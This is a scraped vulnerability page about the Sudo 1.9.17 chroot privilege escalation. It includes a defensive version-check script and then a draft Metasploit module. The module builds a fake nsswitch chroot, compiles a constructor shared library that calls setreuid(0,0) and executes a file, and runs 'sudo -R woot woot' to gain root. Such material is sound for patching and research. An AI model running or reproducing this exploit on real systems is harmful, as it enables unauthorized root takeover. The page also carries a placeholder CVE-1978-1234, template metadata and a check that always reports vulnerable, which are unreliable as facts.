Sudo Chroot 1917 Privilege Escalation

Vulnerability information

Vulnerability name: Sudo Chroot 1.9.17 Privilege Escalation

Vulnerability ID:

  • CVE: CVE-1978-1234

Vulnerability type: Privilege escalation

Severity: High

Vulnerability description: This vulnerability affects the Sudo command on Linux systems, specifically version 1.9.17. Sudo is a widely used program that lets system administrators authorize particular users to run certain commands as root or as another user without knowing the root password; this capability is especially important in enterprise services and multi-user systems. The root cause is a flaw in Sudo's chroot feature: under specific conditions an attacker can use it to bypass security restrictions, execute arbitrary code, and obtain root privileges. Exploitation requires no user interaction and can be automated, so it poses a serious threat to system security. An attacker who successfully exploits this vulnerability gains full control of the system and can run arbitrary commands, access sensitive data, and even undermine system stability. Because Sudo is so widely deployed, the impact of this vulnerability is very broad, and system administrators need to apply the patch promptly to prevent potential attacks.

Product name: Sudo

Affected version: 1.9.17
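A defender-side version check for this issue, added here as an example (it is not part of the original page or of the Metasploit module below). It parses the output of `sudo --version`, including the `pN` patch level, and classifies a host against the affected range; the page lists 1.9.17, and upstream fixed the chroot bug (CVE-2025-32463, referenced in the source URL) in 1.9.17p1, with chroot support having first appeared in 1.9.14. The sample outputs are constructed, not captured from real hosts.

```python
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]

FIRST_AFFECTED: Version = (1, 9, 14, 0)  # chroot support (-R / runchroot) arrived in 1.9.14
FIXED: Version = (1, 9, 17, 1)           # 1.9.17p1 is the first upstream release with the fix

# Matches the first line of `sudo --version`, e.g. "Sudo version 1.9.17p1".
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(output: str) -> Optional[Version]:
    """Return (major, minor, patch, plevel) from `sudo --version` output, or None.

    A missing "pN" suffix is treated as patch level 0 so that tuple comparison
    orders 1.9.17 before 1.9.17p1.
    """
    m = VERSION_RE.search(output)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def assess(output: str) -> str:
    """Classify a host from its `sudo --version` output."""
    v = parse_sudo_version(output)
    if v is None:
        return "unknown"        # not sudo, or a build whose banner differs
    if v < FIRST_AFFECTED:
        return "not affected"   # no chroot feature to abuse
    if v < FIXED:
        return "vulnerable"     # 1.9.14 .. 1.9.17 inclusive
    return "patched"


# Constructed sample outputs for four hypothetical hosts (not real captures).
SAMPLES = {
    "lab-a": "Sudo version 1.9.17\nSudoers policy plugin version 1.9.17\n",
    "lab-b": "Sudo version 1.9.17p1\nSudoers policy plugin version 1.9.17p1\n",
    "lab-c": "Sudo version 1.9.13p3\n",
    "lab-d": "sudo: command not found\n",
}

if __name__ == "__main__":
    for host, out in SAMPLES.items():
        print(f"{host}: {assess(out)}")
```

Distribution packages that backport the fix keep the upstream version string, so treat a "vulnerable" result as a prompt to check the package changelog rather than as a final verdict.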

Source: https://github.com/rapid7/metasploit-framework/blob/a9a701f053f2bdaff372e61e7c25b669f84eacf8/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

Type: rapid7/metasploit-framework: GitHub issues

PoC details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in a command on a linux computer for priv esc.
#
###
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        # The Name should be just like the line of a Git commit - software name,
        # vuln type, class. Preferably apply
        # some search optimization so people can actually find the module.
        # We encourage consistency between module name and file name.
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in a Linux command for priv esc.
        },
        'License' => MSF_LICENSE,
        # The place to add your name/handle and email. Twitter and other contact info isn't handled here.
        # Add reference to additional authors, like those creating original proof of concepts or
        # reference materials.
        # It is also common to comment in who did what (PoC vs metasploit module, etc)
        'Author' => [
          'h00die <mike@stcyrsecurity.com>', # msf module
          'researcher' # original PoC, analysis
        ],
        'Platform' => [ 'linux' ],
        # from underlying architecture of the system. typically ARCH_X64 or ARCH_X86, but the exploit
        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Arch' => [ ARCH_CMD ],
        # What types of sessions we can use this module in conjunction with. Most modules use libraries
        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
        # test both to ensure compatibility.
        'SessionTypes' => [ 'shell' ],
        'Targets' => [[ 'Auto', {} ]],
        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
        # since privilege escalation modules typically result in elevated privileges, this is
        # generally set to true
        'Privileged' => true,
        'References' => [
          [ 'OSVDB', '12345' ],
          [ 'EDB', '12345' ],
          [ 'URL', 'http://www.example.com' ],
          [ 'CVE', '1978-1234' ]
        ],
        'DisclosureDate' => '2023-11-29',
        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
        # It's generally easiest just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget' => 0,
        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
        'Notes' => {
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def check
    return CheckCode::Appears('Vulnerable app version detected')

    # Check the kernel version to see if its in a vulnerable range
    # we guard this because some distros have funky kernel versions https://github.com/rapid7/metasploit-framework/issues/19812
    # release = kernel_release
    # begin
    #   if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
    #      Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
    #     return CheckCode::Safe("Kernel version #{release} is not vulnerable")
    #   end
    # rescue ArgumentError => e
    #   return CheckCode::Safe("Error determining or processing kernel release (#{release}) into known format: #{e}")
    # end
    # vprint_good "Kernel version #{release} appears to be vulnerable"
    #
    # # Check the app is installed and the version, debian based example
    # package = cmd_exec('dpkg -l example | grep \'^ii\'')
    # if package&.include?('1:2015.3.14AR.1-1build1')
    #   return CheckCode::Appears("Vulnerable app version #{package} detected")
    # end
    #
    # CheckCode::Safe("app #{package} is not vulnerable")
  end

  #
  # The exploit method drops a payload file to the system, then either compiles and runs
  # or just runs the exploit on the system.
  #
  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    payload_file = rand_text_alphanumeric(5..10)

    # WritableDir already carries its leading slash (default '/tmp'), so it is not prefixed again here
    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    mkdir(temp_dir)

    cd(temp_dir)

    cmd_exec('mkdir -p woot/etc libnss_')
    cmd_exec(%<echo "passwd: /woot1337" \> woot/etc/nsswitch.conf>)
    cmd_exec('cp /etc/group woot/etc')

    exploit_code = %Q<
      #include <stdlib.h>
      #include <unistd.h>

      __attribute__((constructor))
      void woot(void) {
        setreuid(0,0); /* change to UID 0 */
        setregid(0,0); /* change to GID 0 */
        chdir("/"); /* exit from chroot */
        execve("/tmp/pwned",NULL,NULL); /* root shell */
      }>

    upload_and_compile("#{temp_dir}/libnss_/woot1337.so.2", exploit_code, '-shared -fPIC -Wl,-init,woot')

    cmd_exec('sudo -R woot woot')

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }

    # # Make sure we can write our exploit and payload to the local system
    # unless writable? base_dir
    #   fail_with Failure::BadConfig, "#{base_dir} is not writable"
    # end
    #
    # # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
    # executable_name = ".#{rand_text_alphanumeric(5..10)}"
    # executable_path = "#{base_dir}/#{executable_name}"
    # if live_compile?
    #   vprint_status 'Live compiling exploit on system...'
    #   upload_and_compile executable_path, strip_comments(exploit_data('example.c'))
    #   rm_f "#{executable_path}.c"
    # else
    #   vprint_status 'Dropping pre-compiled exploit on system...'
    #   upload_and_chmodx executable_path, exploit_data('example')
    # end
    #
    # # register the file for automatic cleanup
    # register_files_for_cleanup(executable_path)
    #
    # # Upload payload executable
    # payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    # upload_and_chmodx payload_path, generate_payload_exe
    # # register payload for automatic cleanup
    # register_files_for_cleanup(payload_path)
    #
    # # Launch exploit with a timeout. We also have a vprint_status so if the user wants all the
    # # output from the exploit being run, they can optionally see it
    # timeout = 30
    # print_status 'Launching exploit...'
    # output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
    # output.each_line { |line| vprint_status line.chomp }
  end
end



http://example.com/2025/07/10/github_3687428616/
Author: lianccc
Published: July 10, 2025